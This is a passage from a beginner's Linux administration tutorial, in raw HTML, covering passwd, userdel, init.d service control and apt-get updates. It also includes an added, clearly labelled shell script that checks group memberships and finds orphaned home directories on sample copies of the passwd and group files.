<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$passwd alice</span><span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Changing password for user alice</span><br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">New password: <br class="kix-line-break" />Retype new password: <br class="kix-line-break" />passwd: all authentication tokens updated successfully.</span><span style="background-color: #f9f9f9; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Deleting a user:</span><br />
<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$userdel bob</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Deletes the user bob but keeps his home directory and the files in it.</span><br />
<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$userdel -r bob</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Deletes the user and also removes that user's home directory with everything in it.</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br />
</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: small; white-space: normal;"></span></span><br />
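As an added example (not part of the original post), the script below works through the group relationships that the two useradd forms above create, and finds the home directories that userdel without -r leaves behind. It runs on constructed copies of /etc/passwd and /etc/group inside a temp directory, so it needs no root; WORK, primary_group, supplementary_groups and orphaned_homes are this example's own names.

```shell
#!/bin/sh
# Added example, not from the original post: resolves the group relationships
# that useradd creates and spots the home directories that 'userdel' (without
# -r) leaves behind. It works on constructed copies of /etc/passwd and
# /etc/group in a temp directory, so it needs no root and touches no real account.
set -u

WORK="${TMPDIR:-/tmp}/user_admin_demo.$$"
mkdir -p "$WORK/home/alice" "$WORK/home/bob" "$WORK/home/carol"
PASSWD="$WORK/passwd"
GROUP="$WORK/group"

cleanup() { rm -rf "$WORK"; }
trap cleanup EXIT

# Constructed /etc/passwd: 'useradd bob' gave bob his own group (gid 1001),
# 'useradd -g admins alice' put alice straight into admins (gid 2000).
# carol was removed with 'userdel carol' (no -r): no entry here, but her
# home directory still exists on disk.
cat > "$PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
alice:x:1002:2000::/home/alice:/bin/bash
EOF

# Constructed /etc/group, including a supplementary 'developers' group.
cat > "$GROUP" <<'EOF'
root:x:0:
bob:x:1001:
admins:x:2000:
developers:x:2001:alice,bob
EOF

# primary_group USER: the group whose gid equals USER's gid field in passwd.
# Fails (status 1) when USER has no passwd entry.
primary_group() {
    gid=$(awk -F: -v u="$1" '$1 == u { print $4 }' "$PASSWD")
    [ -n "$gid" ] || return 1
    awk -F: -v g="$gid" '$3 == g { print $1; exit }' "$GROUP"
}

# supplementary_groups USER: groups that list USER in their member field,
# space-separated; empty when USER is a member of none.
supplementary_groups() {
    awk -F: -v u="$1" '
        { n = split($4, m, ",")
          for (i = 1; i <= n; i++) if (m[i] == u) printf "%s ", $1 }' "$GROUP" |
        sed 's/ $//'
}

# orphaned_homes: directories under $WORK/home whose name is not a login name
# in passwd, i.e. the data 'userdel' without -r leaves on disk.
orphaned_homes() {
    for dir in "$WORK"/home/*/; do
        name=$(basename "$dir")
        if ! awk -F: -v u="$name" '$1 == u { found = 1 } END { exit found ? 0 : 1 }' "$PASSWD"; then
            echo "$name"
        fi
    done
}

demo() {
    for user in bob alice; do
        printf '%s: primary=%s supplementary=[%s]\n' \
            "$user" "$(primary_group "$user")" "$(supplementary_groups "$user")"
    done
    printf 'home directories without an owner in passwd: %s\n' "$(orphaned_homes | tr '\n' ' ')"
}

demo
```

On a real system the same checks run against /etc/passwd and /etc/group directly, and an orphaned home directory is worth either archiving or removing so its files do not end up owned by whichever account later receives the recycled uid.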
<div style="background-color: transparent;"><span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span id="internal-source-marker_0.0038698429707437754" style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Starting/stopping services</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The init scripts for installed services live in the /etc/init.d/ directory.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To check the status of a service:</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$/etc/init.d/&lt;service&gt; status</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Replace &lt;service&gt; with the name of the service you want to check.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Example:</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$/etc/init.d/apache2 status</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Apache is NOT running.</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To start a service:</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$/etc/init.d/apache2 start</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> * Starting web server apache2 [ OK ]</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To stop a service:</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$/etc/init.d/apache2 stop</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">* Stopping web server apache2 </span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> ... waiting <span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>[ OK ]</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Keeping the system updated</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">sudo apt-get update<br class="kix-line-break" />sudo apt-get dist-upgrade</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I think this is it for part 1. I might have missed some very important things in this part, but I will try to cover them in later parts.</span></span></div></div></div>